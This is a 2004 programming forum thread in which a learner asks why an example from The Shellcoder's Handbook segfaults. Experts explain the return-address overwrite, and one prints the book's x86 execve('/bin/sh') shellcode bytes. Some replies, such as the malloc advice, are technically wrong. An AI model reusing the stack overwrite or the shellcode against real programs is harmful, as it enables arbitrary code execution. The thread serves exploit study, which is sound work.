Solved

q about char code[] cast as (int)code conversion

Posted on 2004-09-15
15
480 Views
Last Modified: 2010-04-15
HI c area gys and gals.,
following is code from the shellcoder's handbook page 23.  It segfaults, and when debugging i run across an incomprehensible value for (int)shellcode.

char shellcode[] = "0001";
int main() {
  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

AS shown in the debugging cut/paste here:

(gdb) p shellcode
$1 = "0001"
(gdb) p &shellcode
$2 = (char (*)[5]) 0x8049534
(gdb) p (char *)shellcode
$3 = 0x8049534 "0001"
(gdb) p (int)shellcode
$4 = 134518068

$4 is different from the hex value 0x8049534 and sizeof char on RHFC2 is 4, so i thought it would print "1" because char shellcode[] = "0001".  Why doesn't it?
0
Comment
Question by:joesp
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
15 Comments
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12065777
134518068 is exact 0x8049534
(int)shellcode will print the address of shellcode
it not mean parse a string shellcode to int value
so it would not be 1

if you told use about what about this code want to told you in example,it may help us to explain it
0
 
LVL 1

Author Comment

by:joesp
ID: 12066110
uh, yes, i was wrong about the conversion -- i finally found a hextodec in converter.java and it is an int conversion of the address 0x8.....
what does it do?
they are adding 2 to the address of the first variable on the stack to overwrite its RET value (I think the stack is

RET
EBP
shellcode

so &shellcode+2 == &RET
(gdb) p &ret
$1 = (int **) 0xfeefdb64
(gdb) info registers
eax            0x0      0
ecx            0xfeefdbfc       -17835012
edx            0xfeefdbf4       -17835020
ebx            0x552ffc 5582844
esp            0xfeefdb60       0xfeefdb60
ebp            0xfeefdb68       0xfeefdb68
esi            0x1      1
edi            0x5550fc 5591292
eip            0x804834c        0x804834c

so &ret is between ebp and esp

in gdb, &ret+1 == ebp
If i use &ret+1 instead of &ret+2 it doesn't segfault.  Does anybody know the purpose, though, of casting to "int"?
0
 
LVL 4

Expert Comment

by:smpoojary
ID: 12066149
char shellcode[] = "0001";
int main() {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

In the above code you didn't initialize memory for ret. For initializing memory, use malloc() or calloc(). That's why segmentation fault is coming. Means you can't use &ret + 2. First you have to initialize for ret [ret = (int*)malloc(5*sizeof(int));] then you can write ret = ret + 2; (*ret)=(int)shellcode;

-Mahesh
0
VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066177
I think you may make clear about the bytes of ebp .... in your computer and system
0
 
LVL 16

Expert Comment

by:PaulCaswell
ID: 12066316
Its a stack hack!

>>ret = (int *)&ret + 2;

is taking the address of the only variable on the stack and adding 2 to it. It is therefore assuming that the return opcode is next on the stack, it is 2 bytes in length and there is an important address following it. Its then trying to hack that address to contain some stupid value of the address of a string in data space.

It WILL go bang on almost every system other than the one it was crafted for.

Paul
0
 
LVL 1

Author Comment

by:joesp
ID: 12066367
but my post@ 8:43 shows
------------------
(gdb) p &ret
$1 = (int **) 0xfeefdb64
------------------
it has an address on the stack.  Maybe what you mean is -- it's not initialized, so the place it points hasn't been initialized yet, or no space has been allocated on the heap .. but this is all just stack address manipulation.

ebp in x86 points to the beginning of the   stack, like esp points to the current location of the stack pointer
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066411
ret real not point to an alloc memory part
the program surely want to attach some part in stack that normally can not access by the variant in the function
I think it may be the return value of main
but it is straight for
(*ret) = (int)shellcode;
so may be you should read carefully about what this example the book want to told you
if you still unknow the means please post the book reference part of the example and let's discuss about it
0
 
LVL 1

Author Comment

by:joesp
ID: 12066417
i may have to figure out on my own why it's not working.  The book example he gives segfaults, unless i only add 1 to &ret ... which doesn't run the shellcode, so i will have to research this one.  This problem runs deeper than i thought ... originally, i just wanted to know why it cast to an int.  I'm still open for that answer, BTW
0
 
LVL 1

Author Comment

by:joesp
ID: 12066472
source

http://www.sirfsup.com/languages/assembler/koziol/Chapter_02/Shellcoders02sampleprogram05.c

it should do this>:

$gcc shellcode.c -o shellcode
$./shellcode
#

as he explains, the shellcode is the objdump of exe code to create shell
0
 
LVL 5

Accepted Solution

by:
tzxie2000 earned 150 total points
ID: 12066490
Oh, I see

I think it may want to assign the return position in the stack

like a little different code

char shellcode[] = "0001";
int main() {
  int i;
  f();
  i=1;
}
int f() {
  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}

normally the return address will be the code site at i=1; but after

  int *ret;
// Here memory allocation statement for ret is missed.
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;

the book want to assign the return address to a data segment and when the function f //so to main return it will access a data segment and lead to seg fault
0
 
LVL 1

Author Comment

by:joesp
ID: 12066726
does this book example work for anybody else?  You can download that source from that same page by clicking "any_browser_source.txt" or if you are using MSIE you need click "msie.txt"
0
 
LVL 1

Author Comment

by:joesp
ID: 12066889
txzie2000

you are on the right track ... it is overwriting the return address of RET by replacing that value (which points to an address) with the address not of (wherever the hell "main" returns to after it exits) but with the address of shellcode which (magically) (magic helped by the fact that it's an object dump?) executes (itself?) then after main returns ... i am not conviced it is segfaulting because it is trying to access code from the data section .... once the program exits .... the code in the data section is returned to the system, and just be any old addressable address, no?
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12066932
yes I test the code

I think may be the shellcode assigne by the book
char shellcode[] =    
 "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
 "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
 "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

is more special and contain some code in the system

I test the code and my system crashed
   
0
 
LVL 1

Author Comment

by:joesp
ID: 12067108
tzxie2000 thank you for your time.  I am sorry we couldn't resolve this.  it is only the second chapter, i will post here when i find the answer later in the book .... i don't have the time at the moment.
0
 
LVL 5

Expert Comment

by:tzxie2000
ID: 12067174
you're welcome
0

Featured Post

Industry Leaders: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Preface I don't like visual development tools that are supposed to write a program for me. Even if it is Xcode and I can use Interface Builder. Yes, it is a perfect tool and has helped me a lot, mainly, in the beginning, when my programs were small…
This is a short and sweet, but (hopefully) to the point article. There seems to be some fundamental misunderstanding about the function prototype for the "main" function in C and C++, more specifically what type this function should return. I see so…
The goal of this video is to provide viewers with basic examples to understand recursion in the C programming language.
The goal of this video is to provide viewers with basic examples to understand and use switch statements in the C programming language.

622 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question